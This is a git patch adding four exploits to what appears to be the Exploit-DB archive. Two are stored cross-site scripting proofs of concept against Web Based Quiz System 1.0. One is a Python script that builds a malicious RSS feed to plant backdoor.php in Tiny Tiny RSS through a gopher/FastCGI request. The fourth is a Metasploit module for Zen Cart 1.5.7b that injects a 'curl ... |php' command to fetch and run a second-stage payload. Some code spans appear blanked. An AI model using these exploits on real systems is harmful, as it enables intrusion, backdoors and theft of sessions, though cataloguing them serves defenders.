From b35005d47b1caaea03ca2bb5f7df7ac716139ee0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 3 Mar 2021 05:01:55 +0000 Subject: [PATCH] DB: 2021-03-03 4 changes to exploits/shellcodes Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting Tiny Tiny RSS - Remote Code Execution Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting Zen Cart 1.5.7b - Remote Code Execution (Authenticated) --- exploits/php/webapps/49605.txt | 42 +++++++ exploits/php/webapps/49606.py | 83 +++++++++++++ exploits/php/webapps/49607.txt | 60 ++++++++++ exploits/php/webapps/49608.rb | 213 +++++++++++++++++++++++++++++++++ files_exploits.csv | 4 + 5 files changed, 402 insertions(+) create mode 100644 exploits/php/webapps/49605.txt create mode 100755 exploits/php/webapps/49606.py create mode 100644 exploits/php/webapps/49607.txt create mode 100755 exploits/php/webapps/49608.rb diff --git a/exploits/php/webapps/49605.txt b/exploits/php/webapps/49605.txt new file mode 100644 index 000000000..e8e450999 --- /dev/null +++ b/exploits/php/webapps/49605.txt @@ -0,0 +1,42 @@ +# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting +# Date: 2021-03-02 +# Exploit Author: Praharsh Kumar Singh +# Vendor Homepage: https://www.sourcecodester.com +# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html +# Software: Web Based Quiz System +# Version: 1.0 +# Vulnerability Type: Cross-site Scripting +# Vulnerability: Persistent/Stored XSS +# Tested on: Parrot OS + +# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe +# in adding questions in options parameter affected from this vulnerability. +# payload: + +POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 101 +Origin: http://localhost +DNT: 1 +Connection: close +Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1 +Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh +Upgrade-Insecure-Requests: 1 +Sec-GPC: 1 + +qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c + +POC: +# go to url http://localhost:8080/admin.php +# login and add question +# then put the above payload in MCQ options parameter +# then fill the remaining details +# then click add +# go to url http://localhost:8080/login.php +# then login to user account +# then attempt the quiz while attempting the quiz xss pop up there..! \ No newline at end of file diff --git a/exploits/php/webapps/49606.py b/exploits/php/webapps/49606.py new file mode 100755 index 000000000..808031cf2 --- /dev/null +++ b/exploits/php/webapps/49606.py @@ -0,0 +1,83 @@ +# Exploit Title: Tiny Tiny RSS - Remote Code Execution +# Date: 21/09/2020 +# Exploit Author: Daniel Neagaru & Benjamin Nadarević +# Blog post: https://www.digeex.de/blog/tinytinyrss/ +# Software Link: https://git.tt-rss.org/fox/tt-rss +# Version: all before 2020-09-16 +# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef +# Tested on: default docker installation method +# CVE : CVE-2020-25787 + +#!/usr/bin/env python3 + +from sys import argv +import urllib.parse as ul +import base64 + + +def CustomFcgi( filename, output, backdoor): + length=len(output)+len(backdoor)+64 + char=chr(length) + + data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length))) + data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n" + data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/" + + temp1 = chr(len(data) // 256) + temp2 = chr(len(data) % 256) + temp3 = chr(len(data) % 8) + + end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00" + end += "\x00\x00\x00\x00" + start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00" + + payload = start + data + end + def get_payload(payload): + finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/") + return finalpayload + + return "gopher://localhost:9000/_"+get_payload(get_payload(payload)) + + + +TTRSS_PATH = "/var/www/html/tt-rss/" +BACKDOOR_CODE = """ + +""" + + +feed_file = open("malicious_RCE_feed.xml",'w') +filename = TTRSS_PATH + "config.php" +output = TTRSS_PATH + "backdoor.php" + +backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii")) +rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text" + +feed =""" + + + + Exploit demo - rce + + You are getting infected :( + + Check if there is backdoor.php + + + + + ]]> + + + + +""".format(rce) + +feed_file.write(feed) +feed_file.close() \ No newline at end of file diff --git a/exploits/php/webapps/49607.txt b/exploits/php/webapps/49607.txt new file mode 100644 index 000000000..cdca60fa2 --- /dev/null +++ b/exploits/php/webapps/49607.txt @@ -0,0 +1,60 @@ +# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting +# Date: 2021-03-02 +# Exploit Author: P.Naveen Kumar +# Vendor Homepage: https://www.sourcecodester.com +# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html +# Software : Web Based Quiz System +# Version : 1.0 +# Vulnerability Type : Cross-site Scripting +# Vulnerability : Persistent/Stored XSS +# Tested on: Windows 10 Pro + +# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe +# in registration form in name parameter affected from this vulnerability. +# payload: + +# HTTP POST request +POST http://localhost:8080/quiz/register.php HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636 +Content-Length: 690 +Origin: http://localhost:8080 +Connection: keep-alive +Referer: http://localhost:8080/quiz/register.php +Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er +Upgrade-Insecure-Requests: 1 + +-----------------------------283640616528311462411171270636 +Content-Disposition: form-data; name="name" + + +-----------------------------283640616528311462411171270636 +Content-Disposition: form-data; name="email" + +test123@gmail.com +-----------------------------283640616528311462411171270636 +Content-Disposition: form-data; name="password" + +Hacker +-----------------------------283640616528311462411171270636 +Content-Disposition: form-data; name="college" + +hello +-----------------------------283640616528311462411171270636 +Content-Disposition: form-data; name="submit" + + +-----------------------------283640616528311462411171270636-- + +POC: +# go to url http://localhost:8080/quiz/register.php +# then you have to fill the above payload in name/username parameter +# then fill the remaining details +# then click submit +# then login to user account +# then attempt any one quiz after attempting go to ranking section then +# you can see xss pop up there..! \ No newline at end of file diff --git a/exploits/php/webapps/49608.rb b/exploits/php/webapps/49608.rb new file mode 100755 index 000000000..1afa95e0e --- /dev/null +++ b/exploits/php/webapps/49608.rb @@ -0,0 +1,213 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# +# This exploit write payload in database and trig to command +# a bug in an zencart v1.5.7b web application +# +### +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'zencart authenticated remote code execution exploit', + 'Description' => %q( + This exploit module execution os command in zencart. + ), + 'License' => MSF_LICENSE, + 'Author' => ['Mucahit Saratar '], # msf module & research & poc + 'References' =>[ + [ 'OSVDB', '' ], + [ 'EDB', '' ], + [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'], + [ 'CVE', '2021-3291'] + ], + 'Platform' => 'php', + 'Privileged' => false, + 'Arch' => ARCH_PHP, + 'Targets' => [ ['Automatic', { }] ], + 'DisclosureDate' => '2021-01-22', + 'DefaultTarget' => 0 + ) + ) + register_options( + [ + Opt::RPORT(80), + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ true, 'Password to login with', '']), + OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']), + OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']), + OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']), + OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/']) + ], self.class + ) + end + + def start_server + ssltut = false + if datastore["SSL"] + ssltut = true + datastore["SSL"] = false + end + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + print_status("payload is on #{get_uri}") + @adresim = get_uri + datastore['SSL'] = true if ssltut + end + + def on_request_uri(cli, request) + print_good('First stage is executed ! Sending 2nd stage of the payload') + send_response(cli, payload.encoded, {'Content-Type'=>'text/html'}) + end + + def tabanyol + datastore["BASEPATH"] + end + + def isim + datastore["USERNAME"] + end + + def parola + datastore["PASSWORD"] + end + + + def login + #"index.php?cmd=login&camefrom=index.php" + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), + 'vars_get' => { + 'cmd' => 'login', + 'camefrom' => 'index.php' + }) + # + unless res + fail_with(Failure::Unreachable, "Access web application failure") + end + if res.code != 200 + fail_with(Failure::Unreachable, "we not have 200 response") + end + + if !res.get_cookies.empty? + @cookie = res.get_cookies + @csrftoken = res.body.scan(//).flatten[0] || '' + if @csrftoken.empty? + fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') + end + vprint_good("login Csrf token: "+@csrftoken) + end + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"), + 'cookie' => @cookie, + 'vars_post' => { + 'securityToken' => @csrftoken, + 'action' => "do"+@csrftoken, + 'admin_name' => isim, + 'admin_pass' => parola + }) + if res.code != 302 + fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.') + end + true + end + + + def check + unless login + fail_with(Failure::UnexpectedReply, 'Wrong credentials') + return CheckCode::NotVulnerable('Wrong credentials') + end + print_good("We loged in") + Exploit::CheckCode::Vulnerable + CheckCode::Vulnerable('Authenticated successfully') + + end + + def exploit + check + start_server + sleep(4) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), + 'vars_get' => { + 'cmd' => 'modules', + 'set' => datastore["MODULE"], + 'module' => datastore["SETTING"], + 'action' => 'edit' + }, + 'cookie' => @cookie + ) + if res.code != 200 + fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200') + end + # + if res && res.code == 200 + @formtoken = res.body.scan(//).flatten[0] || '' + if @formtoken.empty? + fail_with(Failure::UnexpectedReply, 'securitytoken not in response') + end + #print_good(@formtoken) + #
/) + @textarr = res.body.scan(//) + @secme = {} + @secme["securityToken"] = @formtoken + for @a in @radiolar + @secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //" + end + for @a in @selectler + @secme["configuration[#{@a[0]}]"] = "0" + end + for @a in @textarr + @secme["configuration[#{@a[0]}]"] = "0" + end + print_good(@secme.to_s) + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'cmd' => 'modules', + 'set' => datastore["MODULE"], + 'module' => datastore["SETTING"], + 'action' => 'save' + }, + 'vars_post' => @secme + ) + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), + 'vars_get' => { + 'cmd' => 'modules', + 'set' => datastore["MODULE"], + 'module' => datastore["SETTING"], + 'action' => 'edit' + }, + 'cookie' => @cookie + ) + + end + end + end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f19837ecf..f94cf2776 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43793,3 +43793,7 @@ id,file,description,date,author,type,platform,port 49602,exploits/multiple/webapps/49602.py,"VMware vCenter Server 7.0 - Unauthenticated File Upload",2021-03-01,Photubias,webapps,multiple, 49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php, 49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php, +49605,exploits/php/webapps/49605.txt,"Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting",2021-03-02,"Praharsh Kumar Singh",webapps,php, +49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",2021-03-02,"Daniel Neagaru",webapps,php, +49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting",2021-03-02,"P.Naveen Kumar",webapps,php, +49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,